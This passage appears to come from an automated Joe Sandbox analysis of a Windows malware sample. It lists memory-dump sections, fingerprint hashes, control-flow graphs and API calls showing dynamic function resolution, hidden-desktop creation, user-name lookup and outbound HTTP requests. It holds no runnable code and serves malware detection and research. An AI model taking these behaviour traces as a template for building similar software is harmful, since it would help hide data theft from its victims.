                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: NtQueryInformationProcess
                                                      • API String ID: 2238633743-2781105232
                                                      • Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                      • Instruction ID: 7b5cedaa0e73423a59cdd3f572970276683dffd84f65f372ce21167b4aa31ce5
                                                      • Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                      • Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683364DBB4A900DFB0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422A16
                                                      • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocNameProcessUser
                                                      • String ID:
                                                      • API String ID: 1206570057-0
                                                      • Opcode ID: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
                                                      • Instruction ID: aa6ded6259508bede27090f4c861d2ca31da26e1ef70df7e495680ac72f078f7
                                                      • Opcode Fuzzy Hash: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
                                                      • Instruction Fuzzy Hash: 95F054B1A44614AFD710DF98DD49B9ABBBCF744B65F10021AF915E3680D7B419048BE1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 633 426710-426717 634 426b2e-426bc2 LoadLibraryA * 8 633->634 635 42671d-426b29 GetProcAddress * 43 633->635 636 426bc4-426c33 GetProcAddress * 5 634->636 637 426c38-426c3f 634->637 635->634 636->637 638 426d02-426d09 637->638 639 426c45-426cfd GetProcAddress * 8 637->639 640 426d0b-426d7a GetProcAddress * 5 638->640 641 426d7f-426d86 638->641 639->638 640->641 642 426e19-426e20 641->642 643 426d8c-426e14 GetProcAddress * 6 641->643 644 426f40-426f47 642->644 645 426e26-426f3b GetProcAddress * 12 642->645 643->642 646 426f49-426fb8 GetProcAddress * 5 644->646 647 426fbd-426fc4 644->647 645->644 646->647 648 426ff1-426ff8 647->648 649 426fc6-426fec GetProcAddress * 2 647->649 650 427025-42702c 648->650 651 426ffa-427020 GetProcAddress * 2 648->651 649->648 652 427032-427118 GetProcAddress * 10 650->652 653 42711d-427124 650->653 651->650 652->653 654 427182-427189 653->654 655 427126-42717d GetProcAddress * 4 653->655 656 42718b-427199 GetProcAddress 654->656 657 42719e-4271a5 654->657 655->654 656->657 658 427203 657->658 659 4271a7-4271fe GetProcAddress * 4 657->659 659->658
                                                      APIs
                                                      • GetProcAddress.KERNEL32(77190000,00A56018), ref: 00426725
                                                      • GetProcAddress.KERNEL32(77190000,00A561D8), ref: 0042673D
                                                      • GetProcAddress.KERNEL32(77190000,00A76CE8), ref: 00426756
                                                      • GetProcAddress.KERNEL32(77190000,00A76EC8), ref: 0042676E
                                                      • GetProcAddress.KERNEL32(77190000,00A76E38), ref: 00426786
                                                      • GetProcAddress.KERNEL32(77190000,00A76EF8), ref: 0042679F
                                                      • GetProcAddress.KERNEL32(77190000,00A78B58), ref: 004267B7
                                                      • GetProcAddress.KERNEL32(77190000,00A76E50), ref: 004267CF
                                                      • GetProcAddress.KERNEL32(77190000,00A76E98), ref: 004267E8
                                                      • GetProcAddress.KERNEL32(77190000,00A76E68), ref: 00426800
                                                      • GetProcAddress.KERNEL32(77190000,00A76EB0), ref: 00426818
                                                      • GetProcAddress.KERNEL32(77190000,00A56098), ref: 00426831
                                                      • GetProcAddress.KERNEL32(77190000,00A56238), ref: 00426849
                                                      • GetProcAddress.KERNEL32(77190000,00A56038), ref: 00426861
                                                      • GetProcAddress.KERNEL32(77190000,00A56078), ref: 0042687A
                                                      • GetProcAddress.KERNEL32(77190000,00A76E80), ref: 00426892
                                                      • GetProcAddress.KERNEL32(77190000,00A76EE0), ref: 004268AA
                                                      • GetProcAddress.KERNEL32(77190000,00A78DB0), ref: 004268C3
                                                      • GetProcAddress.KERNEL32(77190000,00A56218), ref: 004268DB
                                                      • GetProcAddress.KERNEL32(77190000,00A7DD08), ref: 004268F3
                                                      • GetProcAddress.KERNEL32(77190000,00A7DC30), ref: 0042690C
                                                      • GetProcAddress.KERNEL32(77190000,00A7DBE8), ref: 00426924
                                                      • GetProcAddress.KERNEL32(77190000,00A7DC90), ref: 0042693C
                                                      • GetProcAddress.KERNEL32(77190000,00A560B8), ref: 00426955
                                                      • GetProcAddress.KERNEL32(77190000,00A7DDB0), ref: 0042696D
                                                      • GetProcAddress.KERNEL32(77190000,00A7DD80), ref: 00426985
                                                      • GetProcAddress.KERNEL32(77190000,00A7DE28), ref: 0042699E
                                                      • GetProcAddress.KERNEL32(77190000,00A7DCC0), ref: 004269B6
                                                      • GetProcAddress.KERNEL32(77190000,00A7DDF8), ref: 004269CE
                                                      • GetProcAddress.KERNEL32(77190000,00A7DD98), ref: 004269E7
                                                      • GetProcAddress.KERNEL32(77190000,00A7DCF0), ref: 004269FF
                                                      • GetProcAddress.KERNEL32(77190000,00A7DC48), ref: 00426A17
                                                      • GetProcAddress.KERNEL32(77190000,00A7DE40), ref: 00426A30
                                                      • GetProcAddress.KERNEL32(77190000,00A79570), ref: 00426A48
                                                      • GetProcAddress.KERNEL32(77190000,00A7DCD8), ref: 00426A60
                                                      • GetProcAddress.KERNEL32(77190000,00A7DD50), ref: 00426A79
                                                      • GetProcAddress.KERNEL32(77190000,00A560D8), ref: 00426A91
                                                      • GetProcAddress.KERNEL32(77190000,00A7DE58), ref: 00426AA9
                                                      • GetProcAddress.KERNEL32(77190000,00A560F8), ref: 00426AC2
                                                      • GetProcAddress.KERNEL32(77190000,00A7DE88), ref: 00426ADA
                                                      • GetProcAddress.KERNEL32(77190000,00A7DCA8), ref: 00426AF2
                                                      • GetProcAddress.KERNEL32(77190000,00A56138), ref: 00426B0B
                                                      • GetProcAddress.KERNEL32(77190000,00A56158), ref: 00426B23
                                                      • LoadLibraryA.KERNEL32(00A7DC78,0042067A), ref: 00426B35
                                                      • LoadLibraryA.KERNEL32(00A7DE10), ref: 00426B46
                                                      • LoadLibraryA.KERNEL32(00A7DD20), ref: 00426B58
                                                      • LoadLibraryA.KERNEL32(00A7DE70), ref: 00426B6A
                                                      • LoadLibraryA.KERNEL32(00A7DD38), ref: 00426B7B
                                                      • LoadLibraryA.KERNEL32(00A7DEA0), ref: 00426B8D
                                                      • LoadLibraryA.KERNEL32(00A7DD68), ref: 00426B9F
                                                      • LoadLibraryA.KERNEL32(00A7DDC8), ref: 00426BB0
                                                      • GetProcAddress.KERNEL32(77040000,00A56178), ref: 00426BCC
                                                      • GetProcAddress.KERNEL32(77040000,00A7DC00), ref: 00426BE4
                                                      • GetProcAddress.KERNEL32(77040000,00A769F0), ref: 00426BFD
                                                      • GetProcAddress.KERNEL32(77040000,00A7DDE0), ref: 00426C15
                                                      • GetProcAddress.KERNEL32(77040000,00A55D38), ref: 00426C2D
                                                      • GetProcAddress.KERNEL32(704D0000,00A78D10), ref: 00426C4D
                                                      • GetProcAddress.KERNEL32(704D0000,00A55B98), ref: 00426C65
                                                      • GetProcAddress.KERNEL32(704D0000,00A78E50), ref: 00426C7E
                                                      • GetProcAddress.KERNEL32(704D0000,00A7DC60), ref: 00426C96
                                                      • GetProcAddress.KERNEL32(704D0000,00A7DEB8), ref: 00426CAE
                                                      • GetProcAddress.KERNEL32(704D0000,00A55C58), ref: 00426CC7
                                                      • GetProcAddress.KERNEL32(704D0000,00A55E58), ref: 00426CDF
                                                      • GetProcAddress.KERNEL32(704D0000,00A7DED0), ref: 00426CF7
                                                      • GetProcAddress.KERNEL32(768D0000,00A55B18), ref: 00426D13
                                                      • GetProcAddress.KERNEL32(768D0000,00A55DF8), ref: 00426D2B
                                                      • GetProcAddress.KERNEL32(768D0000,00A7DC18), ref: 00426D44
                                                      • GetProcAddress.KERNEL32(768D0000,00A7DF18), ref: 00426D5C
                                                      • GetProcAddress.KERNEL32(768D0000,00A55E18), ref: 00426D74
                                                      • GetProcAddress.KERNEL32(75790000,00A78EA0), ref: 00426D94
                                                      • GetProcAddress.KERNEL32(75790000,00A78DD8), ref: 00426DAC
                                                      • GetProcAddress.KERNEL32(75790000,00A7DF90), ref: 00426DC5
                                                      • GetProcAddress.KERNEL32(75790000,00A55C18), ref: 00426DDD
                                                      • GetProcAddress.KERNEL32(75790000,00A55D58), ref: 00426DF5
                                                      • GetProcAddress.KERNEL32(75790000,00A78EC8), ref: 00426E0E
                                                      • GetProcAddress.KERNEL32(75A10000,00A7DF30), ref: 00426E2E
                                                      • GetProcAddress.KERNEL32(75A10000,00A55E78), ref: 00426E46
                                                      • GetProcAddress.KERNEL32(75A10000,00A76A00), ref: 00426E5F
                                                      • GetProcAddress.KERNEL32(75A10000,00A7DF48), ref: 00426E77
                                                      • GetProcAddress.KERNEL32(75A10000,00A7DEE8), ref: 00426E8F
                                                      • GetProcAddress.KERNEL32(75A10000,00A55BF8), ref: 00426EA8
                                                      • GetProcAddress.KERNEL32(75A10000,00A55AF8), ref: 00426EC0
                                                      • GetProcAddress.KERNEL32(75A10000,00A7DFA8), ref: 00426ED8
                                                      • GetProcAddress.KERNEL32(75A10000,00A7DF00), ref: 00426EF1
                                                      • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00426F07
                                                      • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00426F1E
                                                      • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00426F35
                                                      • GetProcAddress.KERNEL32(76850000,00A55B38), ref: 00426F51
                                                      • GetProcAddress.KERNEL32(76850000,00A7DF60), ref: 00426F69
                                                      • GetProcAddress.KERNEL32(76850000,00A7DF78), ref: 00426F82
                                                      • GetProcAddress.KERNEL32(76850000,00A7E068), ref: 00426F9A
                                                      • GetProcAddress.KERNEL32(76850000,00A7E1A0), ref: 00426FB2
                                                      • GetProcAddress.KERNEL32(75690000,00A55D18), ref: 00426FCE
                                                      • GetProcAddress.KERNEL32(75690000,00A55D78), ref: 00426FE6
                                                      • GetProcAddress.KERNEL32(769C0000,00A55D98), ref: 00427002
                                                      • GetProcAddress.KERNEL32(769C0000,00A7E260), ref: 0042701A
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A55E38), ref: 0042703A
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A55EB8), ref: 00427052
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A55CB8), ref: 0042706B
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A7E038), ref: 00427083
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A55E98), ref: 0042709B
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A55ED8), ref: 004270B4
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A55DD8), ref: 004270CC
                                                      • GetProcAddress.KERNEL32(6F8C0000,00A55C38), ref: 004270E4
                                                      • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 004270FB
                                                      • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00427112
                                                      • GetProcAddress.KERNEL32(75D90000,00A7E050), ref: 0042712E
                                                      • GetProcAddress.KERNEL32(75D90000,00A76A10), ref: 00427146
                                                      • GetProcAddress.KERNEL32(75D90000,00A7E248), ref: 0042715F
                                                      • GetProcAddress.KERNEL32(75D90000,00A7E218), ref: 00427177
                                                      • GetProcAddress.KERNEL32(76470000,00A55B58), ref: 00427193
                                                      • GetProcAddress.KERNEL32(6CD20000,00A7E2C0), ref: 004271AF
                                                      • GetProcAddress.KERNEL32(6CD20000,00A55C78), ref: 004271C7
                                                      • GetProcAddress.KERNEL32(6CD20000,00A7E1B8), ref: 004271E0
                                                      • GetProcAddress.KERNEL32(6CD20000,00A7E140), ref: 004271F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                                      • API String ID: 2238633743-3468015613
                                                      • Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                      • Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
                                                      • Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                      • Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0
                                                      APIs
                                                      • lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
                                                      • lstrlenA.KERNEL32(0042D01C), ref: 0041F357
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
                                                      • lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
                                                      • lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
                                                      • lstrlenA.KERNEL32(00A55FB8), ref: 0041F476
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F506
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
                                                      • lstrlenA.KERNEL32(00A76970), ref: 0041F8C2
                                                      • lstrcpy.KERNEL32(00000000,00A76970), ref: 0041F8EF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F966
                                                      • lstrcpy.KERNEL32(00000000,00A76970), ref: 0041FA28
                                                      • lstrcpy.KERNEL32(00000000,00A76980), ref: 0041FA58
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
                                                      • lstrlenA.KERNEL32(00402E3E), ref: 0041FC03
                                                      • lstrcpy.KERNEL32(00000000,00402E3E), ref: 0041FC30
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID: >.@$ERROR
                                                      • API String ID: 367037083-1486603279
                                                      • Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                      • Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
                                                      • Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                      • Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1801 4056c0-4056e4 call 402840 1804 4056f5-4056fb call 404ae0 1801->1804 1805 4056e6-4056eb 1801->1805 1808 405700-405760 call 424090 lstrlenA call 424090 1804->1808 1805->1804 1806 4056ed-4056ef lstrcpy 1805->1806 1806->1804 1813 405762-40576a 1808->1813 1814 40576c-40577c call 402840 1808->1814 1813->1813 1813->1814 1817 40578a-405795 1814->1817 1818 40577e-405784 lstrcpy 1814->1818 1819 405797 1817->1819 1820 4057ad-4057bb call 402840 1817->1820 1818->1817 1821 4057a0-4057a8 1819->1821 1825 4057c9-4057d1 1820->1825 1826 4057bd-4057c3 lstrcpy 1820->1826 1821->1821 1823 4057aa 1821->1823 1823->1820 1827 4057d3-4057db 1825->1827 1828 4057dd-4057eb call 402840 1825->1828 1826->1825 1827->1827 1827->1828 1831 4057f9-405804 1828->1831 1832 4057ed-4057f3 lstrcpy 1828->1832 1833 405813-405820 call 402840 1831->1833 1834 405806-40580e 1831->1834 1832->1831 1838 405822-405828 lstrcpy 1833->1838 1839 40582e-405839 1833->1839 1834->1834 1835 405810 1834->1835 1835->1833 1838->1839 1840 40583b 1839->1840 1841 40584d-40585a call 402840 1839->1841 1842 405840-405848 1840->1842 1846 405868-40589a InternetOpenA StrCmpCA 1841->1846 1847 40585c-405862 lstrcpy 1841->1847 1842->1842 1845 40584a 1842->1845 1845->1841 1848 4058a3-4058a5 1846->1848 1849 40589c 1846->1849 1847->1846 1850 405f34-405ff3 InternetCloseHandle call 402930 * 17 1848->1850 1851 4058ab-4058d3 call 423e10 call 402840 1848->1851 1849->1848 1861 4058f3-4058f8 1851->1861 1862 4058d5-4058d7 1851->1862 1865 4058fa call 402930 1861->1865 1866 4058ff-40590c call 402840 1861->1866 1862->1861 1864 4058d9-4058dc 1862->1864 1864->1861 1869 4058de-4058f0 lstrcpy lstrcatA 1864->1869 1865->1866 1873 40591a-405945 call 402930 * 2 lstrlenA call 402840 1866->1873 1874 40590e-405910 1866->1874 1869->1861 1889 405962-405970 call 402840 1873->1889 1890 405947-40594c 1873->1890 1874->1873 1876 405912-405914 lstrcpy 1874->1876 1876->1873 1897 405972-405974 1889->1897 1898 40598f-4059a9 lstrlenA call 402840 1889->1898 1890->1889 1892 40594e-40595c lstrcpy lstrcatA 1890->1892 1892->1889 1897->1898 1901 405976-40597a 1897->1901 1907 4059c3-4059c8 1898->1907 1908 4059ab-4059ad 1898->1908 1901->1898 1904 40597c-405989 lstrcpy lstrcatA 1901->1904 1904->1898 1911 4059ca call 402930 1907->1911 1912 4059cf-4059dc call 402840 1907->1912 1908->1907 1910 4059af-4059bd lstrcpy lstrcatA 1908->1910 1910->1907 1911->1912 1919 4059ea-405a1e call 402930 * 3 lstrlenA call 402840 1912->1919 1920 4059de-4059e0 1912->1920 1938 405a20-405a25 1919->1938 1939 405a3b-405a4d call 402840 1919->1939 1920->1919 1921 4059e2-4059e4 lstrcpy 1920->1921 1921->1919 1938->1939 1940 405a27-405a29 1938->1940 1944 405a6c-405a71 1939->1944 1945 405a4f-405a51 1939->1945 1940->1939 1942 405a2b-405a35 lstrcpy lstrcatA 1940->1942 1942->1939 1947 405a73 call 402930 1944->1947 1948 405a78-405a84 call 402840 1944->1948 1945->1944 1946 405a53-405a57 1945->1946 1946->1944 1949 405a59-405a66 lstrcpy lstrcatA 1946->1949 1947->1948 1953 405a92-405ac9 call 402930 * 2 InternetConnectA 1948->1953 1954 405a86-405a88 1948->1954 1949->1944 1960 405f2e-405f31 1953->1960 1961 405acf-405b05 HttpOpenRequestA 1953->1961 1954->1953 1955 405a8a-405a8c lstrcpy 1954->1955 1955->1953 1960->1850 1962 405f27-405f28 InternetCloseHandle 1961->1962 1963 405b0b-405e64 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA memcpy lstrlenA memcpy lstrlenA * 2 memcpy lstrlenA HttpSendRequestA InternetReadFile 1961->1963 1962->1960 2096 405f1a-405f24 InternetCloseHandle 1963->2096 2097 405e6a 1963->2097 2096->1962 2098 405e70-405e75 2097->2098 2098->2096 2099 405e7b-405ea4 lstrlenA call 402840 2098->2099 2102 405ec2-405ec9 2099->2102 2103 405ea6-405eaa 2099->2103 2105 405ed6-405ee3 call 402840 2102->2105 2106 405ecb-405ed0 call 402930 2102->2106 2103->2102 2104 405eac-405ebc lstrcpy lstrcatA 2103->2104 2104->2102 2111 405ef1-405f14 call 402930 InternetReadFile 2105->2111 2112 405ee5-405ee7 2105->2112 2106->2105 2111->2096 2111->2098 2112->2111 2113 405ee9-405eeb lstrcpy 2112->2113 2113->2111
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004056EF
                                                      • lstrlenA.KERNEL32(?), ref: 00405742
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
